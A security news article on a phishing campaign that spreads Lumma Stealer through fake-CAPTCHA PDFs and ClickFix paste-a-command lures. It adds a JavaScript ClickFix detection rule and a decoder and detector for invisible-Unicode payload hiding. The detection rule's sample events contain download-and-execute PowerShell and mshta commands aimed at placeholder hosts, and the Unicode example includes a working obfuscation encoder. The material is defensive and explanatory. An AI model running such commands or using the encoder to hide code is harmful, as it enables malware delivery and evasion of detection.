Phishing Campaign Exploits Fake CAPTCHAs in PDFs to Spread Lumma Stealer Malware

Cybersecurity researchers have uncovered a large-scale phishing campaign that uses fake CAPTCHA images embedded in PDF documents to distribute the Lumma stealer malware. The attackers host these malicious PDFs on Webflow’s content delivery network (CDN) and other platforms to lure victims into executing harmful PowerShell commands.
Massive Campaign Leveraging SEO Manipulation
According to Netskope Threat Labs, the campaign involves 260 unique domains hosting over 5,000 phishing PDFs, redirecting unsuspecting users to fraudulent websites. Attackers utilize search engine optimization (SEO) tactics to manipulate search results, tricking users into clicking on these malicious files.
Key findings include:
- The campaign has impacted more than 1,150 organizations and over 7,000 users since mid-2024.
- Primary targets include victims in North America, Asia, and Southern Europe, spanning industries such as technology, financial services, and manufacturing.
- Attackers also upload malicious PDFs to legitimate online libraries like PDFCOFFEE, PDF4PRO, and Internet Archive to further deceive victims searching for documents online.
Fake CAPTCHA Lures & ClickFix Technique
These phishing PDFs serve one of two purposes:
- Credit card theft – Victims are directed to pages designed to harvest payment details.
- Malware delivery – Clicking the fake CAPTCHA image inside the PDF leads to a page that ultimately runs PowerShell commands on the victim's machine, which download and install Lumma Stealer.
The malware-delivery path relies on the ClickFix technique: a second fake CAPTCHA page instructs the victim to copy a command and run it themselves under the pretext of proving they are human. The command invokes MSHTA, which hands off to PowerShell to fetch and execute the malware. Because the user launches the command, there is no exploit to patch; the practical controls are alerting on unexpected mshta.exe and powershell.exe launches from the user's shell and teaching users that no CAPTCHA ever requires running a command.
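A detection rule for the ClickFix hand-off described above, as an added example that is not code from the article, from Netskope, or from the campaign itself. The process-creation events are constructed here, and the field names (ParentImage, Image, CommandLine) follow the Sysmon Event ID 1 schema as an assumption; the rule flags a scripting host launched from explorer.exe (the Run dialog) with a remote URL or download-and-execute cmdlet on its command line, after expanding any base64 -EncodedCommand wrapper.

```javascript
// Added example: detection logic for the ClickFix stage. Not code from the article,
// Netskope, or the campaign. Events are constructed; Sysmon Event ID 1 field names
// are an assumption about the telemetry source. Requires Node.js for Buffer.
const LOLBINS = new Set(["mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe"]);
const URL_RE = /https?:\/\/\S+/i;
const FETCH_RE = /\b(iwr|invoke-webrequest|iex|invoke-expression|downloadstring)\b/i;

function basename(path) {
  return path.split(/[\\/]/).pop().toLowerCase();
}

// PowerShell's -e/-ec/-enc/-EncodedCommand takes base64 of a UTF-16LE string.
// Expand it so the regexes see the real command instead of the wrapper.
function expandEncodedCommand(cmdline) {
  const m = cmdline.match(/-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})/i);
  if (!m) return cmdline;
  return cmdline + " " + Buffer.from(m[1], "base64").toString("utf16le");
}

// Returns null for events that do not match, otherwise the image name and reasons.
function classifyEvent(ev) {
  const image = basename(ev.Image);
  if (!LOLBINS.has(image)) return null;
  // ClickFix relies on the user pasting into the Run dialog, so the parent is
  // explorer.exe rather than a browser, an installer, or a build tool.
  if (basename(ev.ParentImage) !== "explorer.exe") return null;
  const cmd = expandEncodedCommand(ev.CommandLine);
  const reasons = [];
  if (URL_RE.test(cmd)) reasons.push("remote URL on command line");
  if (FETCH_RE.test(cmd)) reasons.push("download-and-execute cmdlet");
  if (image === "mshta.exe") reasons.push("mshta launched interactively");
  return reasons.length ? { image, reasons } : null;
}

function findClickFixCandidates(events) {
  return events
    .map((ev, index) => ({ index, verdict: classifyEvent(ev) }))
    .filter((r) => r.verdict !== null);
}

// Constructed sample telemetry (not real logs). The last event hides its command
// behind -enc, which is why expandEncodedCommand exists.
const ENCODED = Buffer.from("iex (iwr https://cdn.example.invalid/p)", "utf16le").toString("base64");
const EVENTS = [
  { ParentImage: "C:\\Windows\\explorer.exe", Image: "C:\\Windows\\System32\\mshta.exe",
    CommandLine: "mshta https://captcha-check.example.invalid/verify.hta" },
  { ParentImage: "C:\\Windows\\explorer.exe", Image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    CommandLine: 'powershell -w hidden -c "iwr https://cdn.example.invalid/p.ps1 | iex"' },
  { ParentImage: "C:\\Program Files\\Git\\git-bash.exe", Image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    CommandLine: "powershell -ep bypass -File build.ps1" },
  { ParentImage: "C:\\Windows\\explorer.exe", Image: "C:\\Windows\\System32\\notepad.exe",
    CommandLine: "notepad notes.txt" },
  { ParentImage: "C:\\Windows\\explorer.exe", Image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    CommandLine: "powershell -w hidden -enc " + ENCODED },
];

console.log(findClickFixCandidates(EVENTS));
```

The parent-process check is what keeps this rule quiet on developer machines: PowerShell spawned by a build tool with a local script path never reaches the URL and cmdlet tests. Tune LOLBINS and the parent list to the hosts you monitor; on systems where users legitimately open a terminal from the Start menu, expect to whitelist by command-line pattern rather than by parent alone.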
Diverse Delivery Methods & Expanding Threat Landscape
Lumma Stealer has also been disguised as Roblox games and as cracked versions of legitimate software, including Total Commander for Windows. Threat actors spread these malicious files through YouTube videos, comments, and video descriptions, often using compromised accounts to upload the deceptive content.
Lumma Stealer’s Malware-as-a-Service (MaaS) Model
Researchers at Silent Push discovered that stolen Lumma Stealer logs are being shared for free on Leaky[.]pro, a new hacking forum that emerged in late December 2024.
Lumma operates under a malware-as-a-service (MaaS) model, providing cybercriminals with access to:
- Stolen credentials and sensitive user data.
- GhostSocks, a SOCKS5 proxy capability offered alongside Lumma, which routes the attacker's traffic through infected hosts so that logins with stolen credentials appear to come from the victim's own location, bypassing geographic and IP-based restrictions and raising the success rate of unauthorized financial access.
Emerging Techniques in Phishing & Malware Distribution
Recent research from Zscaler ThreatLabz and eSentire highlights similar campaigns using Vidar and Atomic macOS Stealer (AMOS), also delivered through ClickFix phishing schemes.
Meanwhile, Juniper Threat Labs has detected a JavaScript obfuscation method that encodes payloads as invisible Unicode characters, so the hidden code appears inside a string literal as what looks like empty space and evades signature-based detection. The method includes:
- The Hangul half-width filler (U+FFA0) and Hangul full-width filler (U+3164), both rendered as nothing, standing in for the binary digits 0 and 1; each byte of the payload becomes a run of eight fillers, which the script decodes at runtime before executing it.
- Debugger evasion: the script detects analysis attempts and redirects to a benign site instead of running the payload.
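The invisible-Unicode encoding above, worked through as an added example that is not code from the article or from Juniper Threat Labs: an encoder to show what the attacker's string looks like, the decoder a loader would run, and a detector that finds filler runs in script source and recovers what they hide. Which filler stands for 0 and which for 1 is an assumption, and the obfuscated script is constructed here around a harmless console.log call.

```javascript
// Added example: invisible-Unicode payload encoding, decoding, and detection.
// Not code from the article or from Juniper; the 0/1 assignment below is an
// assumption and SAMPLE_SCRIPT is constructed.
const BIT0 = "\uFFA0"; // HALFWIDTH HANGUL FILLER, renders as nothing
const BIT1 = "\u3164"; // HANGUL FILLER, also renders as nothing

// Encode each 8-bit character as eight invisible fillers.
function encodeInvisible(text) {
  let out = "";
  for (const ch of text) {
    const code = ch.charCodeAt(0);
    if (code > 0xff) throw new Error("example encodes 8-bit characters only");
    for (let bit = 7; bit >= 0; bit--) out += (code >> bit) & 1 ? BIT1 : BIT0;
  }
  return out;
}

// Reverse the encoding. A real loader would feed the result to eval()/Function();
// here it is returned so the analyst can read it.
function decodeInvisible(blob) {
  let bits = "";
  for (const ch of blob) {
    if (ch === BIT1) bits += "1";
    else if (ch === BIT0) bits += "0";
    else throw new Error("unexpected code point U+" + ch.codePointAt(0).toString(16));
  }
  if (bits.length % 8 !== 0) throw new Error("bit stream is not byte aligned");
  let out = "";
  for (let i = 0; i < bits.length; i += 8) {
    out += String.fromCharCode(parseInt(bits.slice(i, i + 8), 2));
  }
  return out;
}

// Detector: a run of 16 or more fillers (two encoded bytes) has no place in
// legitimate source. Report where it sits and what it decodes to.
const FILLER_RUN = /[\uFFA0\u3164]{16,}/g;
function findInvisiblePayloads(source) {
  return [...source.matchAll(FILLER_RUN)].map((m) => {
    let decoded = null;
    try { decoded = decodeInvisible(m[0]); } catch (e) { decoded = null; }
    return { offset: m.index, length: m[0].length, decoded };
  });
}

// Constructed sample: to a reader the assignment looks like an empty string.
const HIDDEN = encodeInvisible('console.log("decoded")');
const SAMPLE_SCRIPT = 'var s = "' + HIDDEN + '"; /* loader would decode s and call Function(s)() */';

console.log(findInvisiblePayloads(SAMPLE_SCRIPT));
```

The detector works on source text rather than on behaviour, so it is unaffected by the debugger-evasion logic the page describes; run it over downloaded scripts before they reach a browser, and treat any decodable filler run as hostile regardless of what it decodes to.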
With phishing and malware campaigns growing increasingly sophisticated, cybersecurity professionals emphasize the importance of vigilance, user awareness, and advanced detection mechanisms to combat evolving cyber threats.